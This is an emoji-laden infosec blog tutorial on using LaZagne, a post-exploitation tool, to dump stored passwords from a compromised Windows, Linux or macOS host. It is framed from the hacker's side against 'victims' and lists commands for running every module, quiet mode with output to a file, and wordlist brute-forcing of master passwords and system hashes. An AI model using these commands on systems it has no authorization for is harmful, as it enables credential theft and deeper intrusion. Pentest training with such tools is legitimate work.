Cybermorans🤗
A victim's🥺 credentials is a high priority for hackers😈, since most people reuse passwords. Those credentials can get hackers😈 deeper into a network or other accounts🤫, but digging through the system by hand to find them is difficult and tedious🤨 LaZagne works on Linux, Windows, and macOS, so anyone can practice using it, and it applies to almost every target 😝
LaZagne is included in the remote access tool Pupy as a post exploitation module😈, but you can also use it as a standalone. Still in active development, it currently supports enumerating passwords from a large set of Windows applications. Creds to this project😋 to;
😈 Harmjoy for KeeThief
😈 n1nj4sec for his mimipy module
😈 Benjamin DELPY for mimikatz
😈 @skelsec for Pypykatz
😈 Moyix for Creddump
😈 N0fat for Chainbreaker
😈 Richard Moore for the AES module
😈 Todd Whiteman for the DES module
😈 mitya57 for secretstorage
You can download the standalone version via GitHub. Once you have it😋, use the terminal to extract it and move it to your windows-binaries folder in Kali Linux with the commands👇
unzip Windows.zip
cd Windows
cp laZagne.exe /usr/share/windows-binaries/
This is probably the best time to point out that you should 💥💥 run the application with full administrative rights 💥💥, especially if you are hoping to retrieve Wi-fi and Windows passwords😋 Once you have launched the program, it automatically displays a series of useful modules that you can use. So lets do this....💪
🚀 Enumerate Passwords
LaZagne is non-interactive and can be run in even the most bare-minimum of shells😋 Since it is a post-exploitation tool, which means that to use it, you need to already have access😈 to a host via a shell, or at the minimum, command execution☺️
type and hit enter👇
lazagne -h
Lot of available modules here. To gather Wi-Fi or Windows credentials, run as administrator☺️ and maybe specify which module you want to use. LaZagne includes a convenient all option. Obviously, 😈you want all the passwords so👇
lazagne all
we collected quite a few credentials👆. Lazagne also has a rudimentary brute-forcing😈 capability. If LaZagne is passed a wordlist, it will attempt to brute-force Mozilla master passwords, system hashes, etc. To pass a dictionary file, simply add the path argument👇
lazagne all -path wordlist.txt
In just a few words, LaZagne👆 is a lightweight command-line tool designed to help you recover lost or forgotten password from the most commonly used browsers, a couple of email clients and some FTP transfer and system administration tools☺️
🚀 Lazagne In-depth Usage
👉 Retrieve version👇
laZagne.exe --version
👉 Launch all modules👇
laZagne.exe all
👉 Launch only a specific module👇
laZagne.exe browsers
👉 Launch only a specific software script👇
laZagne.exe browsers -f (for Firefox)
👉 Write all passwords found into a file (-oN for Normal txt, -oJ for Json, -oA for All)👇
laZagne.exe all -oN
👉 Get help👇
laZagne.exe -h
laZagne.exe browsers -h👉 Use a file for dictionary attacks (used only when it's necessary: Mozilla Master Password, system hashes, etc.). The file has to be a wordlist in cleartext (no rainbow), it has not been optimized to be fast but could be useful for basic passwords👇
laZagne.exe all -path file.txt👉 Change verbosity mode (2 different levels)👇
laZagne.exe all -vv
👉 Quiet mode (nothing will be printed on the standard output)👇
laZagne.exe all -quiet -oA
👉 Retrieve passwords on another drive (default: C)👇
laZagne.exe all -drive D💥💥💥 Note: For wifi passwords \ Windows Secrets, launch it with administrator privileges (UAC Authentication / sudo)💥💥💥
🚀Conclusion 🤖
Subscribe to receive notifications of similar posts 😜 where we will be reverse engineering malware, vulnerabilities as well as hacking tools, vectors, stories, tutorials and other Infosec stuff...😋
Follow me on twitter for daily Infosec Memes and shenanigans😝
Morans,
Thank you for taking time and hope you learned something new, Like/Share and leave a comment/review and as always, stay awesome! 😋👊 💪
Comments